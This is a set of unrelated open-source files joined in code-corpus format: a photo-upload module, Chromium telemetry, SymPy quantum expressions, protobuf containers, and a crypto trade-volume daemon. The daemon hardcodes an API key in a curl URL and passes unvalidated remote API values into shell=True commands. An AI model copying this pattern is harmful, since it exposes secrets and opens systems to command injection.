get_exifdate(im) print(filename, 'datetime:', dt) # Create thumbnail print(filename, 'creating thumbnail...') try: im.thumbnail((thumb_width, thumb_width), Image.ANTIALIAS) im.save(thumbpath, 'JPEG') except Exception as e: print('XXX', e) raise e print(filename, 'thumbnail saved') r = {'chksum': chksum, 'date': dt, 'filename': filename} print(filename, '->', r) return r def rotate_photo(chksum, direction): if direction == "right": angle = -90 else: angle = 90 for thumb in (True, False): p = photo_storage.path(chksum, thumb) im = Image.open(p) im = im.rotate(angle) im.save(p, 'JPEG') DATETIMEKEY = 0x0132 # copied from PIL.ExifTags def get_exifdate(im): if isinstance(im, (str, IOBase)): im = Image.open(im) exif = im._getexif() if DATETIMEKEY in exif: dt = datetime.strptime(exif[DATETIMEKEY], '%Y:%m:%d %H:%M:%S') else: dt = datetime.utcnow() return dt class UploadSession: def __init__(self, sessionid, load=None): self.sessionid = sessionid self.outdir = path.join(app.config.get('TMPDIR', '/tmp'), sessionid) self.thumbdir = path.join(self.outdir, '{0}'.format(thumb_width)) self.pool = Pool() self.images = {} if load == 'load': self.__load() elif load == 'create': self.__create() elif load is not None: raise ValueError('load must be "load", "create" or None') def __create(self): if path.exists(self.outdir): raise IOError('Output directory \'{0}\' exists'.format(self.outdir)) os.mkdir(self.outdir, 0o0700) os.mkdir(self.thumbdir, 0o0700) def __load(self): if not path.exists(self.outdir) or not path.exists(self.thumbdir): raise IOError('Output directory \'{0}\' or \'{1}\' does not exist'.format(self.outdir, self.thumbdir)) print('loading upload session {0} from {1} ...'.format(self.sessionid, self.outdir)) for name in os.listdir(self.outdir): fp = path.join(self.outdir, name) if not path.isfile(fp): print(' skipping file \'{0}\''.format(name)) continue print('loading file \'{0}\' to session {1}'.format(name, self.sessionid)) self.images[name] = {'date': get_exifdate(fp), 'filename': name} def get_remote_file(self, fd, filename): print('submitting', fd, filename,' to pool') self.pool.apply_async(prepare_photo, (self.outdir, self.thumbdir, fd, filename), callback=self.__handle_result) def finish_uploads(self): self.pool.close() self.pool.join() def __handle_result(self, result): print('handle_result', result) chksum = result.pop('chksum') self.images[chksum] = result def image_path(self, chksum, thumb): if thumb: return path.join(self.thumbdir, chksum) else: return path.join(self.outdir, chksum) def dbimport(self, table): added = datetime.utcnow() for chksum, d in self.images.items(): date = d['date'] comment = d['comment'] move(self.image_path(chksum, False), photo_storage.path(chksum, False)) move(self.image_path(chksum, True), photo_storage.path(chksum, True)) table.create(chksum=chksum, date=date, added=added, comment=comment, mimetype='image/jpeg') def clear(self): if path.exists(self.outdir): rmtree(self.outdir) self.outdir = None if path.exists(self.thumbdir): rmtree(self.thumbdir) self.thumbdir = None self.images.clear()
mit
rbaindourov/v8-inspector
Source/chrome/tools/telemetry/telemetry/web_perf/metrics/rendering_frame.py
39
3109
# Copyright 2014 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. from collections import defaultdict from telemetry.timeline import bounds from telemetry.timeline import slice as slice_module class MissingData(Exception): pass class NoBeginFrameIdException(Exception): pass class RenderingFrame(object): """Object with information about the triggering of a BeginMainFrame event.""" send_begin_frame_event = 'ThreadProxy::ScheduledActionSendBeginMainFrame' begin_main_frame_event = 'ThreadProxy::BeginMainFrame' def __init__(self, events): all_send_begin_frame_events = [e for e in events if e.name == self.send_begin_frame_event] if len(all_send_begin_frame_events) != 1: raise MissingData('There must be at exactly one %s event.' % self.send_begin_frame_event) all_begin_main_frame_events = [e for e in events if e.name == self.begin_main_frame_event] if not all_begin_main_frame_events: raise MissingData('There must be at least one %s event.' % self.begin_main_frame_event) all_begin_main_frame_events.sort(key=lambda e: e.start) self._send_begin_frame = all_send_begin_frame_events[0] self._begin_main_frame = all_begin_main_frame_events[-1] self._bounds = bounds.Bounds() self._bounds.AddEvent(self._begin_main_frame) self._bounds.AddEvent(self._send_begin_frame) @staticmethod def IsEventUseful(event): return event.name in [RenderingFrame.send_begin_frame_event, RenderingFrame.begin_main_frame_event] @property def bounds(self): return self._bounds @property def queueing_duration(self): return self._begin_main_frame.start - self._send_begin_frame.start def GetFrameEventsInsideRange(renderer_process, timeline_range): """Returns RenderingFrames for all relevant events in the timeline_range.""" # First filter all events from the renderer_process and turn them into a # dictonary of the form: # {0: [send_begin_frame, begin_main_frame, begin_main_frame], # 1: [begin_main_frame, send_begin_frame], # 2: [send_begin_frame, begin_main_frame]} begin_frame_events_by_id = defaultdict(list) for event in renderer_process.IterAllEvents( event_type_predicate=lambda t: t == slice_module.Slice, event_predicate=RenderingFrame.IsEventUseful): begin_frame_id = event.args.get('begin_frame_id', None) if begin_frame_id is None: raise NoBeginFrameIdException('Event is missing a begin_frame_id.') begin_frame_events_by_id[begin_frame_id].append(event) # Now, create RenderingFrames for events wherever possible. frames = [] for events in begin_frame_events_by_id.values(): try: frame = RenderingFrame(events) if frame.bounds.Intersects(timeline_range): frames.append(frame) except MissingData: continue frames.sort(key=lambda frame: frame.bounds.min) return frames
bsd-3-clause
saurabhjn76/sympy
sympy/physics/quantum/qexpr.py
75
14925
from __future__ import print_function, division from sympy import Expr, sympify, Symbol, Matrix from sympy.printing.pretty.stringpict import prettyForm from sympy.core.containers import Tuple from sympy.core.compatibility import is_sequence, string_types, u from sympy.physics.quantum.dagger import Dagger from sympy.physics.quantum.matrixutils import ( numpy_ndarray, scipy_sparse_matrix, to_sympy, to_numpy, to_scipy_sparse ) __all__ = [ 'QuantumError', 'QExpr' ] #----------------------------------------------------------------------------- # Error handling #----------------------------------------------------------------------------- class QuantumError(Exception): pass def _qsympify_sequence(seq): """Convert elements of a sequence to standard form. This is like sympify, but it performs special logic for arguments passed to QExpr. The following conversions are done: * (list, tuple, Tuple) => _qsympify_sequence each element and convert sequence to a Tuple. * basestring => Symbol * Matrix => Matrix * other => sympify Strings are passed to Symbol, not sympify to make sure that variables like 'pi' are kept as Symbols, not the SymPy built-in number subclasses. Examples ======== >>> from sympy.physics.quantum.qexpr import _qsympify_sequence >>> _qsympify_sequence((1,2,[3,4,[1,]])) (1, 2, (3, 4, (1,))) """ return tuple(__qsympify_sequence_helper(seq)) def __qsympify_sequence_helper(seq): """ Helper function for _qsympify_sequence This function does the actual work. """ #base case. If not a list, do Sympification if not is_sequence(seq): if isinstance(seq, Matrix): return seq elif isinstance(seq, string_types): return Symbol(seq) else: return sympify(seq) # base condition, when seq is QExpr and also # is iterable. if isinstance(seq, QExpr): return seq #if list, recurse on each item in the list result = [__qsympify_sequence_helper(item) for item in seq] return Tuple(*result) #----------------------------------------------------------------------------- # Basic Quantum Expression from which all objects descend #----------------------------------------------------------------------------- class QExpr(Expr): """A base class for all quantum object like operators and states.""" # In sympy, slots are for instance attributes that are computed # dynamically by the __new__ method. They are not part of args, but they # derive from args. # The Hilbert space a quantum Object belongs to. __slots__ = ['hilbert_space'] is_commutative = False # The separator used in printing the label. _label_separator = u('') @property def free_symbols(self): return set([self]) def __new__(cls, *args, **old_assumptions): """Construct a new quantum object. Parameters ========== args : tuple The list of numbers or parameters that uniquely specify the quantum object. For a state, this will be its symbol or its set of quantum numbers. Examples ======== >>> from sympy.physics.quantum.qexpr import QExpr >>> q = QExpr(0) >>> q 0 >>> q.label (0,) >>> q.hilbert_space H >>> q.args (0,) >>> q.is_commutative False """ # First compute args and call Expr.__new__ to create the instance args = cls._eval_args(args) if len(args) == 0: args = cls._eval_args(tuple(cls.default_args())) inst = Expr.__new__(cls, *args, **old_assumptions) # Now set the slots on the instance inst.hilbert_space = cls._eval_hilbert_space(args) return inst @classmethod def _new_rawargs(cls, hilbert_space, *args, **old_assumptions): """Create new instance of this class with hilbert_space and args. This is used to bypass the more complex logic in the ``__new__`` method in cases where you already have the exact ``hilbert_space`` and ``args``. This should be used when you are positive these arguments are valid, in their final, proper form and want to optimize the creation of the object. """ obj = Expr.__new__(cls, *args, **old_assumptions) obj.hilbert_space = hilbert_space return obj #------------------------------------------------------------------------- # Properties #------------------------------------------------------------------------- @property def label(self): """The label is the unique set of identifiers for the object. Usually, this will include all of the information about the state *except* the time (in the case of time-dependent objects). This must be a tuple, rather than a Tuple. """ if len(self.args) == 0: # If there is no label specified, return the default return self._eval_args(list(self.default_args())) else: return self.args @property def is_symbolic(self): return True @classmethod def default_args(self): """If no arguments are specified, then this will return a default set of arguments to be run through the constructor. NOTE: Any classes that override this MUST return a tuple of arguments. Should be overidden by subclasses to specify the default arguments for kets and operators """ raise NotImplementedError("No default arguments for this class!") #------------------------------------------------------------------------- # _eval_* methods #------------------------------------------------------------------------- def _eval_adjoint(self): obj = Expr._eval_adjoint(self) if obj is None: obj = Expr.__new__(Dagger, self) if isinstance(obj, QExpr): obj.hilbert_space = self.hilbert_space return obj @classmethod def _eval_args(cls, args): """Process the args passed to the __new__ method. This simply runs args through _qsympify_sequence. """ return _qsympify_sequence(args) @classmethod def _eval_hilbert_space(cls, args): """Compute the Hilbert space instance from the args. """ from sympy.physics.quantum.hilbert import HilbertSpace return HilbertSpace() #------------------------------------------------------------------------- # Printing #------------------------------------------------------------------------- # Utilities for printing: these operate on raw sympy objects def _print_sequence(self, seq, sep, printer, *args): result = [] for item in seq: result.append(printer._print(item, *args)) return sep.join(result) def _print_sequence_pretty(self, seq, sep, printer, *args): pform = printer._print(seq[0], *args) for item in seq[1:]: pform = prettyForm(*pform.right((sep))) pform = prettyForm(*pform.right((printer._print(item, *args)))) return pform # Utilities for printing: these operate prettyForm objects def _print_subscript_pretty(self, a, b): top = prettyForm(*b.left(' '*a.width())) bot = prettyForm(*a.right(' '*b.width())) return prettyForm(binding=prettyForm.POW, *bot.below(top)) def _print_superscript_pretty(self, a, b): return a**b def _print_parens_pretty(self, pform, left='(', right=')'): return prettyForm(*pform.parens(left=left, right=right)) # Printing of labels (i.e. args) def _print_label(self, printer, *args): """Prints the label of the QExpr This method prints self.label, using self._label_separator to separate the elements. This method should not be overridden, instead, override _print_contents to change printing behavior. """ return self._print_sequence( self.label, self._label_separator, printer, *args ) def _print_label_repr(self, printer, *args): return self._print_sequence( self.label, ',', printer, *args ) def _print_label_pretty(self, printer, *args): return self._print_sequence_pretty( self.label, self._label_separator, printer, *args ) def _print_label_latex(self, printer, *args): return self._print_sequence( self.label, self._label_separator, printer, *args ) # Printing of contents (default to label) def _print_contents(self, printer, *args): """Printer for contents of QExpr Handles the printing of any unique identifying contents of a QExpr to print as its contents, such as any variables or quantum numbers. The default is to print the label, which is almost always the args. This should not include printing of any brackets or parenteses. """ return self._print_label(printer, *args) def _print_contents_pretty(self, printer, *args): return self._print_label_pretty(printer, *args) def _print_contents_latex(self, printer, *args): return self._print_label_latex(printer, *args) # Main printing methods def _sympystr(self, printer, *args): """Default printing behavior of QExpr objects Handles the default printing of a QExpr. To add other things to the printing of the object, such as an operator name to operators or brackets to states, the class should override the _print/_pretty/_latex functions directly and make calls to _print_contents where appropriate. This allows things like InnerProduct to easily control its printing the printing of contents. """ return self._print_contents(printer, *args) def _sympyrepr(self, printer, *args): classname = self.__class__.__name__ label = self._print_label_repr(printer, *args) return '%s(%s)' % (classname, label) def _pretty(self, printer, *args): pform = self._print_contents_pretty(printer, *args) return pform def _latex(self, printer, *args): return self._print_contents_latex(printer, *args) #------------------------------------------------------------------------- # Methods from Basic and Expr #------------------------------------------------------------------------- def doit(self, **kw_args): return self def _eval_rewrite(self, pattern, rule, **hints): if hints.get('deep', False): args = [ a._eval_rewrite(pattern, rule, **hints) for a in self.args ] else: args = self.args # TODO: Make Basic.rewrite use hints in evaluating # self.rule(*args, **hints), not having hints breaks spin state # (un)coupling on rewrite if pattern is None or isinstance(self, pattern): if hasattr(self, rule): rewritten = getattr(self, rule)(*args, **hints) if rewritten is not None: return rewritten return self #------------------------------------------------------------------------- # Represent #------------------------------------------------------------------------- def _represent_default_basis(self, **options): raise NotImplementedError('This object does not have a default basis') def _represent(self, **options): """Represent this object in a given basis. This method dispatches to the actual methods that perform the representation. Subclases of QExpr should define various methods to determine how the object will be represented in various bases. The format of these methods is:: def _represent_BasisName(self, basis, **options): Thus to define how a quantum object is represented in the basis of the operator Position, you would define:: def _represent_Position(self, basis, **options): Usually, basis object will be instances of Operator subclasses, but there is a chance we will relax this in the future to accomodate other types of basis sets that are not associated with an operator. If the ``format`` option is given it can be ("sympy", "numpy", "scipy.sparse"). This will ensure that any matrices that result from representing the object are returned in the appropriate matrix format. Parameters ========== basis : Operator The Operator whose basis functions will be used as the basis for representation. options : dict A dictionary of key/value pairs that give options and hints for the representation, such as the number of basis functions to be used. """ basis = options.pop('basis', None) if basis is None: result = self._represent_default_basis(**options) else: result = dispatch_method(self, '_represent', basis, **options) # If we get a matrix representation, convert it to the right format. format = options.get('format', 'sympy') result = self._format_represent(result, format) return result def _format_represent(self, result, format): if format == 'sympy' and not isinstance(result, Matrix): return to_sympy(result) elif format == 'numpy' and not isinstance(result, numpy_ndarray): return to_numpy(result) elif format == 'scipy.sparse' and \ not isinstance(result, scipy_sparse_matrix): return to_scipy_sparse(result) return result def split_commutative_parts(e): """Split into commutative and non-commutative parts.""" c_part, nc_part = e.args_cnc() c_part = list(c_part) return c_part, nc_part def split_qexpr_parts(e): """Split an expression into Expr and noncommutative QExpr parts.""" expr_part = [] qexpr_part = [] for arg in e.args: if not isinstance(arg, QExpr): expr_part.append(arg) else: qexpr_part.append(arg) return expr_part, qexpr_part def dispatch_method(self, basename, arg, **options): """Dispatch a method to the proper handlers.""" method_name = '%s_%s' % (basename, arg.__class__.__name__) if hasattr(self, method_name): f = getattr(self, method_name) # This can raise and we will allow it to propagate. result = f(arg, **options) if result is not None: return result raise NotImplementedError( "%s.%s can't handle: %r" % (self.__class__.__name__, basename, arg) )
bsd-3-clause
Evervolv/android_external_chromium_org
third_party/protobuf/python/google/protobuf/internal/containers.py
224
10004
# Protocol Buffers - Google's data interchange format # Copyright 2008 Google Inc. All rights reserved. # http://code.google.com/p/protobuf/ # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """Contains container classes to represent different protocol buffer types. This file defines container classes which represent categories of protocol buffer field types which need extra maintenance. Currently these categories are: - Repeated scalar fields - These are all repeated fields which aren't composite (e.g. they are of simple types like int32, string, etc). - Repeated composite fields - Repeated fields which are composite. This includes groups and nested messages. """ __author__ = 'petar@google.com (Petar Petrov)' class BaseContainer(object): """Base container class.""" # Minimizes memory usage and disallows assignment to other attributes. __slots__ = ['_message_listener', '_values'] def __init__(self, message_listener): """ Args: message_listener: A MessageListener implementation. The RepeatedScalarFieldContainer will call this object's Modified() method when it is modified. """ self._message_listener = message_listener self._values = [] def __getitem__(self, key): """Retrieves item by the specified key.""" return self._values[key] def __len__(self): """Returns the number of elements in the container.""" return len(self._values) def __ne__(self, other): """Checks if another instance isn't equal to this one.""" # The concrete classes should define __eq__. return not self == other def __hash__(self): raise TypeError('unhashable object') def __repr__(self): return repr(self._values) def sort(self, *args, **kwargs): # Continue to support the old sort_function keyword argument. # This is expected to be a rare occurrence, so use LBYL to avoid # the overhead of actually catching KeyError. if 'sort_function' in kwargs: kwargs['cmp'] = kwargs.pop('sort_function') self._values.sort(*args, **kwargs) class RepeatedScalarFieldContainer(BaseContainer): """Simple, type-checked, list-like container for holding repeated scalars.""" # Disallows assignment to other attributes. __slots__ = ['_type_checker'] def __init__(self, message_listener, type_checker): """ Args: message_listener: A MessageListener implementation. The RepeatedScalarFieldContainer will call this object's Modified() method when it is modified. type_checker: A type_checkers.ValueChecker instance to run on elements inserted into this container. """ super(RepeatedScalarFieldContainer, self).__init__(message_listener) self._type_checker = type_checker def append(self, value): """Appends an item to the list. Similar to list.append().""" self._type_checker.CheckValue(value) self._values.append(value) if not self._message_listener.dirty: self._message_listener.Modified() def insert(self, key, value): """Inserts the item at the specified position. Similar to list.insert().""" self._type_checker.CheckValue(value) self._values.insert(key, value) if not self._message_listener.dirty: self._message_listener.Modified() def extend(self, elem_seq): """Extends by appending the given sequence. Similar to list.extend().""" if not elem_seq: return new_values = [] for elem in elem_seq: self._type_checker.CheckValue(elem) new_values.append(elem) self._values.extend(new_values) self._message_listener.Modified() def MergeFrom(self, other): """Appends the contents of another repeated field of the same type to this one. We do not check the types of the individual fields. """ self._values.extend(other._values) self._message_listener.Modified() def remove(self, elem): """Removes an item from the list. Similar to list.remove().""" self._values.remove(elem) self._message_listener.Modified() def __setitem__(self, key, value): """Sets the item on the specified position.""" self._type_checker.CheckValue(value) self._values[key] = value self._message_listener.Modified() def __getslice__(self, start, stop): """Retrieves the subset of items from between the specified indices.""" return self._values[start:stop] def __setslice__(self, start, stop, values): """Sets the subset of items from between the specified indices.""" new_values = [] for value in values: self._type_checker.CheckValue(value) new_values.append(value) self._values[start:stop] = new_values self._message_listener.Modified() def __delitem__(self, key): """Deletes the item at the specified position.""" del self._values[key] self._message_listener.Modified() def __delslice__(self, start, stop): """Deletes the subset of items from between the specified indices.""" del self._values[start:stop] self._message_listener.Modified() def __eq__(self, other): """Compares the current instance with another one.""" if self is other: return True # Special case for the same type which should be common and fast. if isinstance(other, self.__class__): return other._values == self._values # We are presumably comparing against some other sequence type. return other == self._values class RepeatedCompositeFieldContainer(BaseContainer): """Simple, list-like container for holding repeated composite fields.""" # Disallows assignment to other attributes. __slots__ = ['_message_descriptor'] def __init__(self, message_listener, message_descriptor): """ Note that we pass in a descriptor instead of the generated directly, since at the time we construct a _RepeatedCompositeFieldContainer we haven't yet necessarily initialized the type that will be contained in the container. Args: message_listener: A MessageListener implementation. The RepeatedCompositeFieldContainer will call this object's Modified() method when it is modified. message_descriptor: A Descriptor instance describing the protocol type that should be present in this container. We'll use the _concrete_class field of this descriptor when the client calls add(). """ super(RepeatedCompositeFieldContainer, self).__init__(message_listener) self._message_descriptor = message_descriptor def add(self, **kwargs): """Adds a new element at the end of the list and returns it. Keyword arguments may be used to initialize the element. """ new_element = self._message_descriptor._concrete_class(**kwargs) new_element._SetListener(self._message_listener) self._values.append(new_element) if not self._message_listener.dirty: self._message_listener.Modified() return new_element def extend(self, elem_seq): """Extends by appending the given sequence of elements of the same type as this one, copying each individual message. """ message_class = self._message_descriptor._concrete_class listener = self._message_listener values = self._values for message in elem_seq: new_element = message_class() new_element._SetListener(listener) new_element.MergeFrom(message) values.append(new_element) listener.Modified() def MergeFrom(self, other): """Appends the contents of another repeated field of the same type to this one, copying each individual message. """ self.extend(other._values) def remove(self, elem): """Removes an item from the list. Similar to list.remove().""" self._values.remove(elem) self._message_listener.Modified() def __getslice__(self, start, stop): """Retrieves the subset of items from between the specified indices.""" return self._values[start:stop] def __delitem__(self, key): """Deletes the item at the specified position.""" del self._values[key] self._message_listener.Modified() def __delslice__(self, start, stop): """Deletes the subset of items from between the specified indices.""" del self._values[start:stop] self._message_listener.Modified() def __eq__(self, other): """Compares the current instance with another one.""" if self is other: return True if not isinstance(other, self.__class__): raise TypeError('Can only compare repeated composite fields against ' 'other repeated composite fields.') return self._values == other._values
bsd-3-clause
thraveboy/fbbs-release
SCRIPTS/crypto_volume_daemon_cloud.py
2
1247
import subprocess import string import fileinput import json import time import sys currencies = ['BTC', 'BCC', 'ETH', 'STRAT', 'XMR', 'OMG', 'LTH', 'GNT', 'WAVES','QTUM', 'PIVX', 'SC', 'NEO', 'LTC', 'DASH', 'PAY', 'GBYTE', 'FCT', 'ETC', 'XVG'] update_rate_mins = 5 if (len(sys.argv) > 1): update_rate_mins = int(float(sys.argv[1])) while 1: json_input = subprocess.check_output("curl https://www.worldcoinindex.com/apiservice/json?key=PdEUH2ZNFMW4kaxKO1gGoFHJS", shell=True) json_decoded = json.loads(json_input) coin_values = json_decoded['Markets'] for coin in coin_values: try: coin_name = str(coin['Label'].replace("/BTC", "")) if coin_name in currencies: api_command_str = "python fbbs_api_cloud.py 'TradeVolume" + ":" + coin_name + ":" + str(update_rate_mins) + "min'" print(api_command_str) fbbs_api_obj = subprocess.check_output(api_command_str, shell=True) api_command_str = "python fbbs_api_cloud.py 'TradeVolume" + ":" + coin_name + ":" + str(update_rate_mins) + "min" + " " + str(coin['Volume_24h']) + "'" print(api_command_str) fbbs_api_obj = subprocess.check_output(api_command_str, shell=True) except: pass time.sleep(60*update_rate_mins)
gpl-3.0